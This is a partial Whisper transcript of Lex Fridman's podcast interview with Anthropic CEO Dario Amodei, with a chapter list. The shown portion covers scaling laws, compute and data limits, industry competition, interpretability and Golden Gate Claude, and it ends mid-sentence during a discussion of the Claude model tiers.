
Dario Amodei: Anthropic CEO on Claude, AGI & the Future of AI & Humanity | Lex Fridman Podcast #452


Chapters

0:00 Introduction
3:14 Scaling laws
12:20 Limits of LLM scaling
20:45 Competition with OpenAI, Google, xAI, Meta
26:08 Claude
29:44 Opus 3.5
34:30 Sonnet 3.5
37:50 Claude 4.0
42:02 Criticism of Claude
54:49 AI Safety Levels
65:37 ASL-3 and ASL-4
69:40 Computer use
79:35 Government regulation of AI
98:24 Hiring a great team
107:14 Post-training
112:39 Constitutional AI
118:05 Machines of Loving Grace
137:11 AGI timeline
149:46 Programming
156:46 Meaning of life
162:53 Amanda Askell - Philosophy
165:21 Programming advice for non-technical people
169:9 Talking to Claude
185:41 Prompt engineering
194:15 Post-training
198:54 Constitutional AI
203:48 System prompts
209:54 Is Claude getting dumber?
221:56 Character training
222:56 Nature of truth
227:32 Optimal rate of failure
234:43 AI consciousness
249:14 AGI
257:52 Chris Olah - Mechanistic Interpretability
262:44 Features, Circuits, Universality
280:17 Superposition
291:16 Monosemanticity
298:08 Scaling Monosemanticity
306:56 Macroscopic behavior of neural networks
311:50 Beauty of neural networks

Whisper Transcript

00:00:00.000 | If you extrapolate the curves that we've had so far, right?
00:00:03.080 | If, if you say, well, I don't know, we're starting to get to like PhD level.
00:00:07.360 | And last year we were at undergraduate level and the year before we were at
00:00:11.340 | like the level of a high school student, again, you can, you can quibble with
00:00:14.980 | at what tasks and for what we're still missing modalities, but those are being
00:00:19.140 | added, like computer use was added, like image generation has been added.
00:00:22.680 | If you just kind of like eyeball the rate at which these capabilities are
00:00:26.280 | increasing, it does make you think that we'll get there by 2026 or 2027.
00:00:31.640 | I think there are still worlds where it doesn't happen in, in a hundred years.
00:00:34.920 | But the number of those worlds is rapidly decreasing.
00:00:38.520 | We are rapidly running out of truly convincing blockers, truly compelling
00:00:43.500 | reasons why this will not happen in the next few years, the scale up is very quick.
00:00:47.500 | Like we do this today, we make a model and then we deploy thousands, maybe
00:00:51.720 | tens of thousands of instances of it.
00:00:53.960 | I think by the time, you know, certainly within two to three years, whether we
00:00:57.640 | have these super powerful AIs or not, clusters are going to get to the size
00:01:01.240 | where you'll be able to deploy millions of these. I am optimistic about meaning.
00:01:05.660 | I worry about economics and the concentration of power.
00:01:10.420 | That's actually what I worry about more.
00:01:12.000 | The abuse of power and AI increases the amount of power in the world.
00:01:18.280 | And if you concentrate that power and abuse that power,
00:01:21.040 | it can do immeasurable damage.
00:01:23.040 | It's very frightening.
00:01:24.240 | It's very, it's very frightening.
00:01:25.440 | The following is a conversation with Dario Amodei, CEO of Anthropic, the
00:01:33.200 | company that created Claude, that is currently and often at the top of
00:01:37.360 | most LLM benchmark leaderboards.
00:01:39.500 | On top of that, Dario and the Anthropic team have been outspoken advocates for
00:01:44.860 | taking the topic of AI safety very seriously, and they have continued to
00:01:49.880 | publish a lot of fascinating AI research on this and other topics.
00:01:54.960 | I'm also joined afterwards by two other brilliant people from Anthropic.
00:02:00.320 | First, Amanda Askell, who is a researcher working on alignment and fine-tuning
00:02:06.680 | of Claude, including the design of Claude's character and personality.
00:02:11.000 | A few folks told me she has probably talked with Claude more
00:02:15.400 | than any human at Anthropic.
00:02:18.240 | So she was definitely a fascinating person to talk to about prompt
00:02:22.280 | engineering and practical advice on how to get the best out of Claude.
00:02:26.440 | After that, Chris Olah stopped by for a chat.
00:02:30.440 | He's one of the pioneers of the field of mechanistic interpretability, which
00:02:36.000 | is an exciting set of efforts that aims to reverse engineer neural networks to
00:02:41.000 | figure out what's going on inside, inferring behaviors from neural activation
00:02:46.600 | patterns inside the network.
00:02:48.760 | This is a very promising approach for keeping future
00:02:52.560 | super-intelligent AI systems safe.
00:02:54.720 | For example, by detecting from the activations when the model is trying
00:02:59.480 | to deceive the human it is talking to.
00:03:02.400 | This is the Lex Fridman Podcast.
00:03:05.360 | To support it, please check out our sponsors in the description.
00:03:08.520 | And now, dear friends, here's Dario Amodei.
00:03:12.960 | Let's start with the big idea of scaling laws and the scaling hypothesis.
00:03:17.760 | What is it, what is its history, and where do we stand today?
00:03:21.360 | So I can only describe it as it, you know, as it relates to kind of my own
00:03:25.960 | experience, but I've been in the AI field for about 10 years, and it was
00:03:30.440 | something I noticed very early on.
00:03:32.160 | So I first joined the AI world when I was working at Baidu with Andrew Ng in
00:03:36.840 | late 2014, which is almost exactly 10 years ago now, and the first thing we
00:03:42.400 | worked on was speech recognition systems.
00:03:45.000 | And in those days, I think deep learning was a new thing.
00:03:47.840 | It had made lots of progress, but everyone was always saying, we don't
00:03:51.520 | have the algorithms, we need to succeed.
00:03:53.360 | You know, we're not, we're only matching a tiny, tiny fraction.
00:03:57.960 | There's so much we need to kind of discover algorithmically.
00:04:01.160 | We haven't found the picture of how to match the human brain.
00:04:04.000 | And when, you know, in some ways it was fortunate.
00:04:08.560 | I was kind of, you know, you can have almost beginner's luck, right?
00:04:11.040 | I was like a newcomer to the field.
00:04:13.360 | And, you know, I looked at the neural net that we were using for speech,
00:04:16.360 | the recurrent neural networks, and I said, I don't know, what if you make
00:04:19.480 | them bigger and give them more layers?
00:04:21.120 | And what if you scale up the data along with this, right?
00:04:23.560 | I just saw these as, as like independent dials that you could turn.
00:04:27.280 | And I noticed that the model started to do better and better as you gave them
00:04:31.200 | more data, as you, as you made the models larger, as you trained them for longer.
00:04:35.880 | And I didn't measure things precisely in those days, but, but along
00:04:40.800 | with, with colleagues, we very much got the informal sense that the more
00:04:45.120 | data and the more compute and the more training you put into these
00:04:48.960 | models, the better they perform.
00:04:51.000 | And so initially my thinking was, Hey, maybe that is just true for
00:04:55.400 | speech recognition systems, right?
00:04:56.960 | Maybe, maybe that's just one particular quirk, one particular area.
00:05:00.840 | I think it wasn't until 2017 when I first saw the results from GPT-1 that it
00:05:07.600 | clicked for me that language is probably the area in which we can do this.
00:05:11.480 | We can get trillions of words of language data.
00:05:15.240 | We can train on them.
00:05:16.560 | And the models we were trained in those days were tiny.
00:05:19.280 | You could train them on one to eight GPUs.
00:05:22.080 | Whereas, you know, now we train jobs on tens of thousands, soon
00:05:25.240 | going to hundreds of thousands of GPUs.
00:05:27.360 | And so when I, when I saw those two things together and, you know, there
00:05:31.720 | were a few people like Ilya Sutskever, who, who you've interviewed, who
00:05:34.880 | had somewhat similar views, right?
00:05:36.760 | He might've been the first one, although I think a few people came to, came to
00:05:40.680 | similar views around the same time, right?
00:05:42.440 | There was, you know, Rich Sutton's bitter lesson, there was Gwern, who wrote
00:05:46.120 | about the scaling hypothesis, but I think somewhere between 2014 and 2017 was when
00:05:52.840 | it really clicked for me when I really got conviction that, Hey, we're going to
00:05:56.400 | be able to do these incredibly wide cognitive tasks if we just, if we just
00:06:01.720 | scale up the models and at, at every stage of scaling, there are always
00:06:06.280 | arguments and, you know, when I first heard them, honestly, I thought probably
00:06:09.960 | I'm the one who's wrong.
00:06:10.920 | And, you know, all these, all these experts in the field are right.
00:06:13.200 | They know the situation better, better than I do.
00:06:15.560 | Right.
00:06:15.840 | There's, you know, the Chomsky argument about like, you can get
00:06:18.840 | syntactics, but you can't get semantics.
00:06:21.120 | There was this idea, Oh, you can make a sentence make sense, but you
00:06:23.680 | can't make a paragraph make sense.
00:06:25.440 | The latest one we have today is.
00:06:27.600 | Uh, you know, we're going to run out of data or the data isn't high
00:06:31.080 | quality enough or models can't reason.
00:06:33.920 | And, and each time, every time we managed to, we managed to either find a way
00:06:38.160 | around or scaling just is the way around.
00:06:40.400 | Um, sometimes it's one, sometimes it's the other.
00:06:43.160 | Uh, and, and so I'm now at this point, I, I still think, you know, it's, it's,
00:06:47.720 | it's always quite uncertain.
00:06:49.080 | We have nothing but inductive inference to tell us that the next few years are
00:06:53.280 | going to be like the next, the last 10 years, but, but I've seen, I've seen the
00:06:57.640 | movie enough times I've seen the story happen for, for enough times to really
00:07:02.160 | believe that probably the scaling is going to continue and that there's
00:07:05.880 | some magic to it that we haven't really explained on a theoretical basis yet.
00:07:10.160 | And of course the scaling here is.
00:07:12.160 | Bigger networks, bigger data, bigger compute.
00:07:16.920 | All of those in particular, linear scaling up of bigger networks, bigger
00:07:22.880 | training times, and, uh, more and more data.
00:07:26.760 | Uh, so all of these things, almost like a chemical reaction, you know, you have
00:07:30.240 | three ingredients in the chemical reaction and you need to linearly
00:07:33.600 | scale up the three ingredients.
00:07:34.760 | If you scale up one, not the others, you run out of the other
00:07:37.760 | reagents and the, and the reaction stops.
00:07:39.800 | But if you scale up everything, everything in series, then,
00:07:43.560 | then the reaction can proceed.
00:07:44.960 | And of course, now that you have this kind of empirical science slash art,
00:07:48.880 | you can apply it to other, uh, more nuanced things like scaling laws applied
00:07:54.880 | to interpretability or scaling laws applied to post-training or just seeing
00:07:59.760 | how does this thing scale, but the big scaling law, I guess the underlying
00:08:04.040 | scaling hypothesis has to do with big networks, big data leads to intelligence.
00:08:09.200 | Yeah, we've, we've documented scaling laws in lots of domains
00:08:13.320 | other than language, right?
00:08:15.040 | So, uh, initially the, the paper we did that first showed it was in early 2020
00:08:20.120 | where we first showed it for language.
00:08:21.760 | There was then some work late in 2020 where we showed the same thing for
00:08:26.560 | other modalities like images, video, text to image, image to text, math,
00:08:33.080 | that they all had the same pattern.
00:08:34.640 | And, and you're right now, there are other stages like post-training or there
00:08:38.480 | are new types of reasoning models.
00:08:40.280 | And in, in, in all of those cases that we've measured, we see similar,
00:08:45.600 | similar types of scaling laws.
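(For reference, the scaling-law fits alluded to here, such as the 2020 language-model scaling papers, typically model loss as a sum of power laws in model and data size. The particular parameterization below is illustrative; the constants are fit empirically per domain, and this is not necessarily Anthropic's internal form.)

```latex
% Common parametric form of a neural scaling law (illustrative)
L(N, D) \;\approx\; E + \frac{A}{N^{\alpha}} + \frac{B}{D^{\beta}}
% N: model parameters, D: training tokens, E: irreducible loss of the data,
% A, B, \alpha, \beta: constants fit empirically for each domain or modality.
```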
00:08:47.200 | A bit of a philosophical question, but what's your intuition about why
00:08:52.080 | bigger is better in terms of network size and data size?
00:08:56.040 | Why does it lead to more intelligent models?
00:08:59.840 | So in my previous career as a, as a biophysicist, so I did physics
00:09:03.680 | undergrad and then biophysics in, in, in, in grad school.
00:09:07.040 | So I think back to what I know as a physicist, which is actually much less
00:09:10.400 | than what some of my colleagues at Anthropic have in terms of, in terms
00:09:14.280 | of expertise in physics, uh, there's this, there's this concept called the
00:09:18.960 | one over F noise and one over X distributions, um, where, where often,
00:09:24.400 | um, uh, you know, just, just like if you add up a bunch of natural
00:09:28.120 | processes, you get a Gaussian.
00:09:29.840 | If you add up a bunch of kind of differently distributed natural
00:09:34.240 | processes, if you like, if you like, take a, take a, um, probe
00:09:38.160 | and, and hook it up to a resistor.
00:09:39.800 | The distribution of the thermal noise in the resistor goes
00:09:43.680 | as one over the frequency.
00:09:44.960 | Um, it's some kind of natural convergent distribution.
00:09:47.920 | Uh, and I think what it amounts to is that if you look
00:09:53.280 | at a lot of things that are, that are produced by some natural process that
00:09:57.480 | has a lot of different scales, right.
00:09:59.240 | Not a Gaussian, which is kind of narrowly distributed, but, you know,
00:10:02.760 | if I look at kind of like large and small fluctuations that lead to lead
00:10:07.680 | to electrical noise, um, they have this decaying one over X distribution.
00:10:12.960 | And so now I think of like patterns in the physical world, right.
00:10:16.560 | If I, if, or, or in language, if I think about the patterns in language,
00:10:20.520 | there are some really simple patterns.
00:10:22.240 | Some words are much more common than others like the, then there's
00:10:25.640 | basic noun, verb structure.
00:10:27.560 | Then there's the fact that, you know, nouns and verbs have to agree.
00:10:30.880 | They have to coordinate and there's the higher level sentence structure.
00:10:33.960 | Then there's the thematic structure of paragraphs.
00:10:36.280 | And so the fact that there's this regressing structure, you can imagine
00:10:40.480 | that as you make the networks larger, first, they capture the really simple
00:10:44.880 | correlations, the really simple patterns.
00:10:46.800 | And there's this long tail of other patterns.
00:10:49.560 | And if that long tail of other patterns is really smooth, like it is with the
00:10:54.080 | one over F noise in, you know, physical processes, like, like, like, like
00:10:58.000 | resistors, then you can imagine as you make the network larger, it's kind of
00:11:02.040 | capturing more and more of that distribution.
00:11:04.480 | And so that smoothness gets reflected in how well the models are at
00:11:08.600 | predicting that how well they perform.
00:11:10.160 | Language is an evolved process, right?
00:11:13.560 | We've, we've developed language.
00:11:15.160 | We have common words and less common words.
00:11:18.000 | We have common expressions and less common expressions.
00:11:20.760 | We have ideas, cliches that are expressed frequently, and we have novel ideas.
00:11:25.800 | And that process has, has developed, has evolved with
00:11:29.000 | humans over millions of years.
00:11:30.920 | And so the, the, the guess, and this is pure speculation would be, would be
00:11:35.360 | that there is, there's some kind of long tail distribution of, of, of
00:11:39.920 | the distribution of these ideas.
00:11:41.520 | So there's the long tail, but also there's the height of the hierarchy
00:11:45.200 | of concepts that you're building up.
00:11:47.120 | So the bigger the network, presumably you have a higher capacity to.
00:11:50.520 | Exactly.
00:11:51.000 | If you have a small network, you only get the common stuff, right?
00:11:53.880 | If, if I take a tiny neural network, it's very good at understanding that,
00:11:58.040 | you know, a sentence has to have, you know, verb, adjective, noun, right?
00:12:01.440 | But it's, it's terrible at deciding what those verb, adjective, and noun
00:12:05.360 | should be and whether they should make sense.
00:12:06.960 | If I make it just a little bigger, it gets good at that.
00:12:09.640 | Then suddenly it's good at the sentences, but it's not good at the paragraphs.
00:12:12.960 | And so these, these rarer and more complex patterns get picked up as I
00:12:17.320 | add, as I add more capacity to the network.
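(As a toy illustration of this long-tail picture, not anything from Anthropic: if pattern frequencies follow a Zipf-like power law, then capacity for only the top-k patterns captures the head of the distribution, and each increase in k keeps picking up a smoothly shrinking slice of the tail.)

```python
import numpy as np

# Toy Zipf-like frequency distribution over "patterns" (purely illustrative).
ranks = np.arange(1, 1_000_001)
probs = (1.0 / ranks) / (1.0 / ranks).sum()

# Probability mass covered if a model only captures the k most common patterns,
# a crude stand-in for model capacity.
for k in [100, 10_000, 1_000_000]:
    print(f"top {k:>9,} patterns cover {probs[:k].sum():.0%} of occurrences")
# Coverage rises smoothly (~36%, ~68%, 100%), mirroring smooth gains from scale.
```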
00:12:19.880 | Well, the natural question then is what's the ceiling of this?
00:12:23.440 | Yeah.
00:12:23.920 | Like how complicated and complex is the real world?
00:12:27.800 | How much stuff is there to learn?
00:12:29.600 | I don't think any of us knows the answer to that question.
00:12:32.320 | Um, my strong instinct would be that there's no ceiling
00:12:36.440 | below the level of humans, right?
00:12:37.880 | We humans are able to understand these various patterns.
00:12:40.840 | And so that, that makes me think that if we continue to, you know,
00:12:45.040 | scale up these, these, these models to kind of develop new methods for
00:12:49.800 | training them and scaling them up, uh, that will at least get to the level
00:12:53.600 | that we've gotten to with humans.
00:12:55.240 | There's then a question of, you know, how much more is it possible
00:12:58.720 | to understand than humans do?
00:13:00.040 | How much, how much is it possible to be smarter and more perceptive than humans?
00:13:04.400 | I would guess the answer has, has got to be domain dependent.
00:13:09.520 | If I look at an area like biology and, you know, I wrote this essay,
00:13:13.400 | machines of loving grace, it seems to me that humans are struggling to
00:13:18.480 | understand the complexity of biology, right?
00:13:20.480 | If you go to Stanford or to Harvard or to Berkeley, you have whole departments
00:13:25.800 | of, you know, folks trying to study, you know, like the immune
00:13:29.120 | system or metabolic pathways.
00:13:31.200 | And, and each person understands only a tiny bit, part of it specializes.
00:13:36.480 | And they're struggling to combine their knowledge with that of,
00:13:39.280 | with that of other humans.
00:13:40.400 | And so I have an instinct that there's, there's a lot of room at
00:13:43.240 | the top for AI's to get smarter.
00:13:45.560 | If I think of something like materials in the, in the physical world, or, you
00:13:51.160 | know, um, like addressing, you know, conflicts between humans or something
00:13:55.200 | like that, I mean, you know, it may be that some of these problems
00:13:58.600 | are not intractable, but much harder.
00:14:00.720 | And, and it may be that there's only, there's only so well you can
00:14:04.760 | do at some of these things, right?
00:14:06.040 | Just like with speech recognition.
00:14:07.280 | There's only so clear I can hear your speech.
00:14:09.760 | So I think in some areas there may be ceilings in, in, in, you know, that
00:14:14.440 | are very close to what humans have done in other areas, those
00:14:17.240 | ceilings may be very far away.
00:14:18.800 | And I think we'll only find out when we build these systems.
00:14:21.680 | Uh, there's, it's very hard to know in advance.
00:14:23.880 | We can speculate, but we can't be sure.
00:14:25.440 | And in some domains, the ceiling might have to do with human bureaucracies
00:14:29.720 | and things like this, as you write about.
00:14:31.160 | Yeah.
00:14:31.520 | So humans fundamentally have to be part of the loop.
00:14:34.720 | That's the cause of the ceiling, not maybe the limits of the intelligence.
00:14:38.160 | Yeah.
00:14:38.480 | I think in many cases, um, you know, in theory, technology
00:14:43.360 | could change very fast.
00:14:44.840 | For example, all the things that we might invent with respect to biology.
00:14:49.080 | Um, but remember there's, there's a, you know, there's a clinical trial
00:14:52.640 | system that we have to go through to actually administer these things to humans.
00:14:56.840 | I think that's a mixture of things that are unnecessary and bureaucratic
00:15:01.000 | and things that kind of protect the integrity of society.
00:15:04.160 | And the whole challenge is that it's hard to tell.
00:15:06.120 | It's hard to tell what's going on.
00:15:07.640 | Uh, it's hard to tell which is which right.
00:15:09.200 | My, my view is definitely, I think in terms of drug development, we, my view
00:15:14.480 | is that we're too slow and we're too conservative, but certainly if you get
00:15:18.120 | these things wrong, you know, it's, it's possible to risk people's
00:15:21.720 | lives by, by being too reckless.
00:15:24.760 | And so at least, at least some of these human institutions
00:15:27.880 | are in fact protecting people.
00:15:30.040 | So it's, it's all about finding the balance.
00:15:32.480 | I strongly suspect that balance is kind of more on the side of pushing to make
00:15:36.680 | things happen faster, but there is a balance.
00:15:38.560 | If we do hit a limit, if we do hit a slowdown in the scaling laws, what
00:15:45.000 | do you think would be the reason?
00:15:46.000 | Is it compute limited, data limited?
00:15:48.000 | Uh, is it something else?
00:15:49.520 | Idea limited?
00:15:50.800 | So a few things now we're talking about hitting the limit before we get to the
00:15:55.040 | level of, of humans and the skill of humans.
00:15:57.640 | Um, so, so I think one that's, you know, one that's popular today, and I think,
00:16:02.080 | you know, could be a limit that we run into.
00:16:04.320 | I like most of the limits I would bet against it, but it's definitely
00:16:07.320 | possible is we simply run out of data.
00:16:09.520 | There's only so much data on the internet and there's issues with
00:16:12.440 | the quality of the data, right?
00:16:13.800 | You can get hundreds of trillions of words on the internet, but a lot of it
00:16:18.600 | is, is repetitive or it's search engine, you know, search engine optimization
00:16:24.000 | drivel, or maybe in the future it'll even be text generated by AIs itself.
00:16:28.000 | Uh, and, and so I think there are limits to what, to, to, to what can be produced
00:16:33.760 | in this way that said we, and I would guess other companies are working on
00:16:38.720 | ways to make data synthetic, uh, where you can, you know, you can use the model
00:16:43.640 | to generate more data of the type that you have that you have already, or
00:16:47.720 | even generate data from scratch.
00:16:49.760 | If you think about, uh, what was done with, uh, DeepMind's AlphaGo Zero, they
00:16:54.200 | managed to get a bot all the way from, you know, no ability to play Go whatsoever
00:16:59.000 | to above human level, just by playing against itself, there was no example
00:17:02.960 | data from humans required in the, the AlphaGo Zero version of it.
00:17:07.120 | The other direction of course, is these reasoning models that do chain of
00:17:10.680 | thought and stop to think, um, and, and reflect on their own thinking in a way.
00:17:14.800 | That's another kind of synthetic data coupled with reinforcement learning.
00:17:19.080 | So my, my guess is with one of those methods, we'll get around the data
00:17:22.640 | limitation, or there may be other sources of data that are, that are available.
00:17:26.440 | Um, we could just observe that even if there's no problem with data, as
00:17:31.080 | we start to scale models up, they just stop getting better.
00:17:33.840 | It's, it seemed to be a reliable observation that they've gotten better.
00:17:38.080 | That could just stop at some point for a reason we don't understand.
00:17:41.640 | Um, the answer could be that we need to, uh, you know, we need
00:17:46.920 | to invent some new architecture.
00:17:49.040 | Um, it's been, there have been problems in the past with, with say, numerical
00:17:53.760 | stability of models where it looked like things were, were leveling off, but,
00:17:57.640 | but actually, you know, when we, when we, when we found the right unblocker,
00:18:01.480 | they didn't end up doing so.
00:18:02.680 | So perhaps there's new, some new optimization method or some new,
00:18:07.160 | uh, technique we need to, to unblock things.
00:18:09.720 | I've seen no evidence of that so far, but if things were to, to slow down,
00:18:13.600 | that perhaps could be one reason.
00:18:15.720 | What about the limits of compute, meaning, uh, the expensive nature of
00:18:21.760 | building bigger and bigger data centers?
00:18:23.360 | So right now, I think, uh, you know, most of the frontier model companies
00:18:28.040 | I would guess are operating in, you know, roughly, you know, $1 billion
00:18:32.480 | scale, plus or minus a factor of three, right?
00:18:34.640 | Those are the models that exist now or are being trained now.
00:18:37.640 | Uh, I think next year we're going to go to a few billion and then, uh, 2026,
00:18:43.120 | we may go to, uh, you know, above $10 billion, and probably by
00:18:47.280 | 2027, there are ambitions to build
00:18:51.640 | hundred-billion-dollar clusters.
00:18:53.240 | And I think all of that actually will happen.
00:18:55.680 | There's a lot of determination to build the compute, to
00:18:58.400 | do it within this country.
00:19:00.000 | Uh, and I would guess that it actually does happen.
00:19:02.560 | Now, if we get to a hundred billion, that's still not enough compute.
00:19:06.400 | That's still not enough scale.
00:19:07.720 | Then either we need even more scale or we need to develop some way of
00:19:12.640 | doing it more efficiently of shifting the curve, um, I think between all of
00:19:16.520 | these, one of the reasons I'm bullish about powerful AI happening so fast
00:19:20.760 | is just that if you extrapolate the next few points on the curve, we're very
00:19:24.920 | quickly getting towards human level ability, right?
00:19:28.080 | Some of the new models that, that we developed, some, some reasoning models
00:19:32.040 | that have come from other companies, they're starting to get to what I would
00:19:35.160 | call the PhD or professional level, right?
00:19:37.720 | If you look at their, their coding ability, um, the latest model we
00:19:41.840 | released, Sonnet 3.5, the new or updated version, it gets something
00:19:47.040 | like 50% on SWE-bench, and SWE-bench is an example of a bunch of professional
00:19:52.120 | real world software engineering tasks.
00:19:54.240 | At the beginning of the year, I think the state of the art was three or 4%.
00:19:59.520 | So in 10 months, we've gone from 3% to 50% on this task.
00:20:04.320 | And I think in another year we'll probably be at 90%.
00:20:07.040 | I mean, I don't know, but might, might even be, might even be less than that.
00:20:11.120 | Uh, we've seen similar things in graduate level, math, physics, and
00:20:15.560 | biology from models like OpenAI's O1.
00:20:18.360 | Uh, so, uh, if we, if we just continue to extrapolate this right, in terms of
00:20:23.800 | skill, skill that we have, I think if we extrapolate the straight curve within a
00:20:28.760 | few years, we will get to these models being, you know, above the, the highest
00:20:33.320 | professional level in terms of humans.
00:20:34.960 | Now, will that curve continue?
00:20:36.240 | You've pointed to, and I've pointed to a lot of reasons why, you know, possible
00:20:40.360 | reasons why that might not happen, but if the, if the extrapolation curve
00:20:43.960 | continues, that is the trajectory we're on.
00:20:45.680 | So Anthropic has several competitors.
00:20:48.840 | It'd be interesting to get your sort of view of it all.
00:20:51.080 | OpenAI, Google, XAI, Meta.
00:20:53.200 | What does it take to win in the broad sense of win in the space?
00:20:57.880 | Yeah.
00:20:58.600 | So I want to separate out a couple of things, right?
00:21:01.000 | So, you know, Anthropic's, Anthropic's mission is to kind of
00:21:04.480 | try to make this all go well.
00:21:06.320 | Right.
00:21:06.760 | And, and, you know, we have a theory of change called race to the top, right?
00:21:11.480 | Race to the top is about trying to push the other players to do the
00:21:17.320 | right thing by setting an example.
00:21:19.160 | It's not about being the good guy.
00:21:20.600 | It's about setting things up so that all of us can be the good guy.
00:21:23.600 | I'll give a few examples of this.
00:21:25.480 | Early in the history of Anthropic, one of our co-founders, Chris Ola, who I
00:21:29.280 | believe you're, you're interviewing soon, you know, he's the co-founder of the
00:21:32.800 | field of mechanistic interpretability, which is an attempt to understand
00:21:36.280 | what's going on inside AI models.
00:21:38.520 | So we had him and one of our early teams focus on this area of interpretability,
00:21:44.520 | which we think is good for making models safe and transparent.
00:21:48.160 | For three or four years, that had no commercial application whatsoever.
00:21:52.600 | It still doesn't today.
00:21:53.800 | We're doing some early betas with it and probably it will eventually, but, you
00:21:58.200 | know, this is a very, very long research bet and one in which we've, we've built
00:22:02.880 | in public and shared our results publicly.
00:22:05.160 | And, and we did this because, you know, we think it's a way to make models safer.
00:22:09.160 | An interesting thing is that as we've done this, other companies
00:22:13.240 | have started doing it as well.
00:22:14.640 | In some cases, because they've been inspired by it, in some cases, because
00:22:18.720 | they're worried that, uh, you know, if, if other companies are doing this, that
00:22:23.640 | look more responsible, they want to look more responsible too.
00:22:26.840 | No one wants to look like the irresponsible actor.
00:22:29.240 | And, and so they adopt this, they adopt this as well.
00:22:32.520 | When folks come to Anthropic, interpretability is often a draw.
00:22:36.000 | And I tell them the other places you didn't go, tell them why you came here.
00:22:40.080 | Um, and, and then you see soon that there, that there's interpretability
00:22:45.280 | teams else elsewhere as well.
00:22:47.200 | And in a way that takes away our competitive advantage, because it's
00:22:50.280 | like, Oh, now others are doing it as well, but it's good, it's
00:22:54.960 | good for the broader system.
00:22:56.000 | And so we have to invent some new thing that we're doing that
00:22:58.480 | others aren't doing as well.
00:22:59.600 | And the hope is to basically bid up, bid up the importance of, of, of
00:23:05.280 | doing the right thing.
00:23:06.120 | And it's not, it's not about us in particular, right?
00:23:08.320 | It's not about having one particular good guy.
00:23:11.200 | Other companies can do this as well.
00:23:13.240 | If they, if they, if they join the race to do this, that's, that's, you
00:23:16.560 | know, that's the best news ever.
00:23:17.640 | Right.
00:23:17.960 | Um, uh, it's, it's just, it's about kind of shaping the incentives to
00:23:21.800 | point upward instead of shaping the incentives to point, to point downward.
00:23:25.680 | And we should say this example of the field of, uh, mechanistic
00:23:28.280 | interpretability is just a rigorous non hand wavy way of doing AI safety.
00:23:34.320 | Or it's tending that way.
00:23:36.120 | Trying to, I mean, I think we're still early, um, in terms of our
00:23:40.240 | ability to see things, but I've been surprised at how much we've been
00:23:43.880 | able to look inside these systems and understand what we see, right.
00:23:48.200 | Unlike with the scaling laws, where it feels like there's some, you know,
00:23:51.880 | law that's driving these models to perform better on, on the inside.
00:23:56.440 | The models aren't, you know, there's no reason why they should be
00:23:58.920 | designed for us to understand them.
00:24:00.240 | Right.
00:24:00.480 | They're designed to operate.
00:24:01.600 | They're designed to work just like the human brain or human biochemistry.
00:24:05.440 | They're not designed for a human to open up the hatch, look
00:24:08.080 | inside and understand them.
00:24:09.400 | But we have found, and you know, you can talk in much more detail
00:24:12.960 | about this to Chris, that when we open them up, when we do look inside
00:24:16.680 | them, we, we find things that are surprisingly interesting.
00:24:19.920 | And as a side effect, you also get to see the beauty of these models.
00:24:23.000 | You get to explore the sort of, uh, the beautiful nature of large
00:24:26.920 | neural networks through the mech interp kind of methodology.
00:24:29.720 | I'm amazed at how clean it's been.
00:24:31.280 | I'm amazed at things like induction heads.
00:24:34.560 | I'm amazed at things like, uh, you know, that, that we can, you know,
00:24:40.080 | use sparse autoencoders to find these directions within the networks.
00:24:44.160 | Uh, and that the directions correspond to these very clear concepts.
00:24:49.120 | We demonstrated this a bit with Golden Gate Claude.
00:24:52.040 | So this was an experiment where we found a direction inside one of the
00:24:56.720 | neural networks layers that corresponded to the Golden Gate Bridge.
00:24:59.840 | And we just turned that way up.
00:25:01.360 | And so we, we released this model as a demo.
00:25:04.400 | It was kind of half a joke, uh, for a couple of days.
00:25:07.080 | Uh, but it was, it was illustrative of, of the method we developed.
00:25:10.400 | And, uh, you could take this Golden Gate model, you could ask it about anything.
00:25:14.760 | You know, it'd be like, you
00:25:18.160 | could say, how was your day? And anything you asked, because this feature was
00:25:21.320 | activated, it would connect to the Golden Gate Bridge.
00:25:23.200 | So it would say, you know, I'm, I'm, I'm feeling relaxed and expansive, much
00:25:27.840 | like the arches of the Golden Gate Bridge, or, you know, It would masterfully
00:25:31.760 | change topic to the Golden Gate Bridge and integrate it.
00:25:34.760 | There was also a sadness to it, to, to the focus it had on the Golden Gate Bridge.
00:25:38.640 | I think people quickly fell in love with it.
00:25:40.320 | I think some people already miss it because it was taken down, I think after a day.
00:25:45.440 | Somehow these interventions on the model, um, where, where, where, where you kind
00:25:50.440 | of adjust its behavior somehow emotionally made it seem more human than any other
00:25:55.720 | version of the model, strong personality, strong, strong personality.
00:25:59.520 | It has these kind of like obsessive interests.
00:26:02.400 | You know, we can all think of someone who's like obsessed with something.
00:26:05.200 | So it does make it feel somehow a bit more human.
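(For readers curious what "turning a feature way up" means mechanically, here is a minimal numpy sketch of steering along a learned feature direction. The vectors below are random placeholders; in the actual Golden Gate Claude demo the direction came from a sparse autoencoder trained on a middle layer of the production model, and the clamping is applied inside the forward pass.)

```python
import numpy as np

rng = np.random.default_rng(0)
activation = rng.normal(size=16)          # toy residual-stream activation

# Hypothetical unit-norm feature direction, e.g. a sparse-autoencoder decoder
# row observed to fire on Golden Gate Bridge-related text.
feature_direction = rng.normal(size=16)
feature_direction /= np.linalg.norm(feature_direction)

def steer(act: np.ndarray, direction: np.ndarray, target: float) -> np.ndarray:
    """Clamp the activation's component along one feature direction to `target`."""
    current = act @ direction
    return act + (target - current) * direction

steered = steer(activation, feature_direction, target=10.0)
print(round(float(steered @ feature_direction), 2))   # -> 10.0: feature "turned way up"
```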
00:26:07.800 | Let's talk about the present.
00:26:09.200 | Let's talk about Claude.
00:26:10.320 | So this year a lot has happened.
00:26:13.240 | In March, Claude 3 Opus, Sonnet, and Haiku were released.
00:26:17.760 | Then Claude 3.5 Sonnet in July, with an updated version just now released.
00:26:24.120 | And then also Claude 3.5 Haiku was released.
00:26:26.800 | Okay.
00:26:27.560 | Can you explain the difference between Opus, Sonnet and Haiku and how we should
00:26:33.280 | think about the different versions?
00:26:34.400 | Yeah.
00:26:34.800 | So let's go back to March when we first released these three models.
00:26:38.800 | So, you know, our thinking was, you know, different companies produce
00:26:43.120 | kind of large and small models, better and worse models.
00:26:46.560 | We felt that there was demand both for a really powerful model.
00:26:52.200 | Um, you know, when you, that might be a little bit slower that
00:26:54.800 | you'd have to pay more for.
00:26:56.040 | And also for fast, cheap models that are as smart as they can
00:27:01.280 | be for how fast and cheap, right.
00:27:02.880 | Whenever you want to do some kind of like, you know, difficult analysis.
00:27:07.080 | Like if I, you know, I want to write code for instance, or, you know, I
